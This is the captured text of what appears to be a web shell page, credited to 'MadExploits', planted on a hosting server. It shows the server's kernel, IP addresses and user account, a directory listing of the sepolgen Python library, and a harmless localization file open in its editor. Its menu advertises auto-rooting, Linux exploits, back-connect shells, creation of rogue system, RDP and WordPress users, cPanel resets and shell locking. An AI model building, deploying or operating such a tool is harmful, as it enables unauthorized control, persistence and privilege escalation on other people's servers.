Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.140
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
sepolgen /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
access.py
11.7
KB
-rw-r--r--
audit.py
21.46
KB
-rw-r--r--
classperms.py
2.75
KB
-rw-r--r--
defaults.py
2.83
KB
-rw-r--r--
interfaces.py
16.08
KB
-rw-r--r--
lex.py
41.9
KB
-rw-r--r--
matching.py
8.45
KB
-rw-r--r--
module.py
7.12
KB
-rw-r--r--
objectmodel.py
6.37
KB
-rw-r--r--
output.py
5.04
KB
-rw-r--r--
policygen.py
14.99
KB
-rw-r--r--
refparser.py
30.6
KB
-rw-r--r--
refpolicy.py
31.42
KB
-rw-r--r--
sepolgeni18n.py
1013
B
-rw-r--r--
util.py
5.35
KB
-rw-r--r--
yacc.py
134.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sepolgeni18n.py
# Authors: Karl MacMillan <kmacmillan@mentalrootkit.com> # # Copyright (C) 2006 Red Hat # see file 'COPYING' for use and warranty information # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; version 2 only # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # try: import gettext t = gettext.translation("selinux-python", localedir="/usr/share/locale", fallback=True) _ = t.gettext except: def _(str): return str
Close